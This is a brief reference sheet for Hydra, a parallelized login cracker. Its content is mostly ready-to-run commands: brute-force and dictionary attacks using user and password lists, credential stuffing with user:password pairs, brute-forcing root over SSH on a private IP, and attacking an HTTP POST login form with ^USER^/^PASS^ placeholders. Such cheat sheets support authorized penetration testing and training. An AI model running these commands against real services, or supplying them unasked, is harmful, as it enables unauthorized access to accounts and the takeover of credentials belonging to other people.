Hydra
Hydra is a parallelized login cracker that supports numerous protocols. It is a fast and flexible tool used to perform brute-force and dictionary attacks against authentication services.
Basic Usages
Brute-Force with User and Password Lists
This command attempts to find valid credentials by testing combinations from a user list (-L) and a password list (-P) against a specified service and target.
hydra -L user.list -P password.list <service>://<ip>Brute-Force with a Single User
When the username is known, you can specify it with -l and provide a password list (-P) to find the correct password.
hydra -l username -P password.list <service>://<ip>Brute-Force with a Single Password
If you suspect a specific password is being reused across multiple accounts, use -p to provide the password and -L for the list of usernames.
hydra -L user.list -p password <service>://<ip>Credential Stuffing
The -C flag uses a file containing user:password pairs to test for credential reuse against a service, such as SSH.
hydra -C <user_pass.list> ssh://<IP>Brute-Forcing SSH
This example targets the SSH service, attempting to log in as the root user by cycling through a password list.
hydra -l root -P /path/to/password_list.txt ssh://192.168.1.100Brute-Forcing a Web Login Form
This command targets an HTTP POST login form. It specifies the login page, the request body format, and the failure message to detect unsuccessful attempts. ^USER^ and ^PASS^ are placeholders that Hydra replaces with credentials from the provided lists.
hydra -l admin -P /path/to/password_list.txt 127.0.0.1 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"